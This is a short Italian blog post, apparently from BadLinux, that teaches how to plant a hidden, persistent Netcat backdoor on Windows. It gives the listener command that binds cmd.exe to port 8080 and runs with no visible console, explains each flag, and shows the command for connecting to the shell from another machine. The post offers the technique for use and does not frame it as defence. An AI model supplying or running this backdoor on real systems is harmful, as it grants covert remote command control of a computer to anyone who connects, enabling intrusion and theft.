Backdoor con Netcat Windows

by mike on

Una delle backdoor di controllo remoto più facili da impostare è Netcat.

https://it.wikipedia.org/wiki/Netcat

Netcat può essere configurato in modo da ascoltare su una certa porta e avviare un eseguibile quando un sistema remoto si connette.

Impostando un listener netcat in modo che avvii una shell di comandi Windows, è possibile che questa shell compaia su un sistema remoto.

La sintassi per avviare netcat in una modalità  di ascolto nascosta è la seguente:

nc -L -d -e cmd.exe -p 8080

L’opzione -L rende il listener persistente tra più interruzioni della connessione;

-d attiva l’esecuzione di netcat in maniera nascosta (senza console interattiva);

-e specifica il programma da avviare (in questo caso cmd.exe).

Infine, -p specifica la porta su cui mettersi in ascolto.

Il comando retribuisce una shell di comandi remota a chiunque si connetta alla porta 8080.

Per connetterci da un altro sistema il comando da digitare è il seguente:

nc 192.168.202.44 8080 

Dove in questo caso 192.168.202.44 è l’indirizzo ip a cui ci connettiamo e 8080 la porta

 

Fonti: Hacker 7.0 Apogeo

 

L’articolo Backdoor con Netcat Windows proviene da BadLinux.

Written by: mike